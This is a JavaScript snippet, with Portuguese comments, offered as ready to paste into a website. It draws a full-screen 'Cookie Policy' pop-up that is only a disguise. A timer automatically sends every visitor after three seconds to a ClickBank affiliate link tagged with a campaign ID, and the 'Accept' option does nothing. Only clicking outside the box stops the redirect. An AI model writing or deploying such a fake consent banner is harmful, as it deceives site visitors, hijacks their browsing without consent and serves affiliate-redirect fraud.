// Versão otimizada e testada para seu site (function() { // Criação dinâmica do pop-up var popup = document.createElement('div'); popup.id = 'ikariaCookiePopup'; popup.style.cssText = ` position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.7); display: flex; justify-content: center; align-items: center; z-index: 999999; `; popup.innerHTML = `

Cookie Policy

This website uses cookies to personalize content and ads, provide social media features, and analyze our traffic. By clicking Accept, you agree to our use of cookies.

Accept
`; // Adiciona ao corpo do documento document.body.appendChild(popup); // Redirecionamento automático após 3 segundos var redirectTimer = setTimeout(function() { window.location.href = "https://21a6anupa91s6kfcgcy3p9btfr.hop.clickbank.net/?&campaign=siteoficial"; }, 3000); // Fechar ao clicar fora popup.addEventListener('click', function(e) { if (e.target === this) { clearTimeout(redirectTimer); this.style.display = 'none'; } }); })();